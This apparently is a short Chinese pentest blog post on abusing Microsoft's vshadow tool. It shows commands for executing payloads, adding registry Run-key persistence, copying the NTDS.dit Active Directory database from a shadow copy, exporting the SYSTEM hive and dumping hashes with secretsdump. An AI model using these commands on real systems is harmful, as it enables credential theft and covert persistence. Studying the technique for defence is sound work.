zoukankan      html  css  js  c++  java
  • (vshadow)Volume Shadow在渗透测试中的利用

    本文根据嘶吼学习总结出文中几种方式
    Vshadow包含在window SDK中,由微软签名。

    Vshadow包括执行脚本和调用支持卷影快照管理的命令的功能,这些功能可能会被滥用于特权级的防御规避,权限持久性和文件提取。

    命令执行

    vshadow执行命令使用-exec参数该参数可以执行二进制文件(exe)或(.bat / .cmd),-exec不支持命令参数,因此有效执行需要在这些限制的某些中进行包装。

    vshadow.exe -nw -exec=<path	oexe> <system drive>
    vshadow.exe -nw -exec=c:1.bat c:
    

    自动启动持久性和防御逃避
    通过输入以下命令为我们的有效的添加持久性(通过注册表运行密钥):

    reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v VSSBackup /t REG_EXPAND_SZ /d "C:Program FilesMicrosoftVSSSDK72ToolsVSSReportsvshadow.exe -nw -exec=c:1.bat c:"
    

    vshadow.png

    敏感文件提取– AD数据库
    先执行vshadow.exe -p -nw c:
    由于ntds在C:WINDOWSNTDSNTDS.DIT
    执行完之后会展开
    1.png
    然后在利用图中指出地址代表C:盘符进行ntds数据库的复制
    2.png

    再利用reg导出HKLMSYSTEM的信息
    3.png

    最后利用impacket里面的secretsdump.py读取哈希

    secretsdump.py -ntds ntds.dit.bak -system system.bak LOCAL
    

    删除卷影集

    vshadow -dx={前面记录下来的号码}
  • 相关阅读:
    centos7内存处理
    MySQl分析工具之mysqltuner.pl及mysqlslap
    Mycat-web 安装
    【NOI2001】【Luogu P2704】【POJ1185】炮兵阵地
    【OpenJudge 7834】分成互质组
    Assignment(单调队列)
    OO’s Sequence
    【注意】邻接表
    20190405模拟测试
    【USACO2010open】时间旅行
  • 原文地址:https://www.cnblogs.com/M0rta1s/p/11920886.html
Copyright © 2011-2022 走看看